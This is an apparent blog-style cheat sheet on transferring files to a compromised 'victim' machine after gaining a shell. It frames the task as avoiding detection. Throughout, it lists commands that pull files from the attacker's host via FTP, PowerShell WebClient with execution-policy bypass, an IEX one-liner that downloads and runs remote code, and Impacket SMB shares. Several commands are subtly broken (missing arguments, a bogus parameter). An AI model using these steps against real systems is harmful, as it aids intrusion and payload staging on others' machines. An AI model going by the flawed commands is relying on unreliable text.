Foreword

To avoid detection, it is best to use tools that are native to the victim’s computer.

FTP with Windows Host

While having a shell on the Windows machine, start an FTP server on your host machine. Follow these steps if you don’t already have FTP server installed:

sudo apt-get install vsftpd  
sudo service vsftpd start  
service vsftpd status #status should be active

To check if your server is working, type ftp localhost. If you see the message “Connected to localhost”, your FTP server is running.

Accessing File With Interactive Shell

If you have an interactive shell on the Windows machine, run this command.

cscript wget.vbs http://<YOUR IP>/<PATH TO FILE> <FILENAME TO SAVE AS>

Accessing File With Non-Interactive Shell

If you don’t have an interactive shell, you can’t start PowerShell.exe. A workaround is to create a PowerShell script and execute it:

echo $storageDir = $pwd > wget.ps1  
echo $webclient = New-Object System.Net.WebClient >>wget.ps1  
echo $url = "http://<YOUR IP>/<PATH TO FILE>" >>wget.ps1  
echo $file = "output-file.exe" >>wget.ps1  
echo $webclient.DownloadFile($url,$file) >>wget.ps1

To invokewget.ps1, call

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

-ExecutionPolicy Bypass -noLogo -NonInteractive --- stealthly

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://<YOUR IP>/<FILENAME>')"

IEX(New-Object Net.WebClient).downloadString('http://<YOUR IP>/<FILENAME>')

Getting Files Through PowerShell

On your Kali Linux machine, make a copy of the file you want to send to /var/www/html/ . On the Window’s machine, execute the following:

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.10.128/unko.txt','C:\Users\Administrator\Desktop\transferme.txt')"

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.119.146/gori.ps1')"

File Transfer With SMB

Method 1

Get smbserver.pyfrom Impacket and run the following on your Kali Linux machine:

smbserver.py gori $(pwd) -smb2support -user gori -pass gorigori

Run this on the victim’s machine:

New-PSDrive -Name "gori" -PSProvider "FileSystem" -gori "\\<YOUR IP>\gori"

Method 2

Run this on your Kali machine:

smbserver.py kali .

Run this on the victim’s machine:

On victim's \\<YOUR IP ADDRESS>\kali\FILE\_NAME.exe "whoami" # "whoami" confirms that it is running

File Transfer With an HTTP Server

On your machine run:

python3 -m http.server 80

This will start an HTTP server on port 80 with the root of the HTTP server being in the directory that you executed the command from. To get a file, run this on the victim’s machine:

wget http://<YOUR IP>/path/to/file.txt

File Transfer with SCP and RSYNC

Both of these methods of file transfer occur over SSH. Secure Copy Protocol (SCP) is being deprecated, however, if you’re able to use it, the syntax is fairly simple.

scp <SOURCE> <DESTINATION>

In this example, we are using SCP to copy a file from a remote host to the working directory of our local machine such that our computer is on the receiving end.

scp username@ip_address:/home/username/filename

If you are looking to transfer a file from your computer to the remote host, the following syntax can be used:

scp filename username@ip_address:/home/username

The same commands can be used with RYSNC by simply replacing scp with rsync .

rsync <SOURCE> <DESTINATION>

Conclusion

There are countless ways to transfer files between two computers. Among the most common methods are HTTP and FTP, but if those don’t work, there is a chance that some of the other options here will. Some honorable mentions that I didn’t go into detail on are SSHFS, SFTP, Winscp, and Samba. I hope that you were able to find value in this article and remember to never stop learning.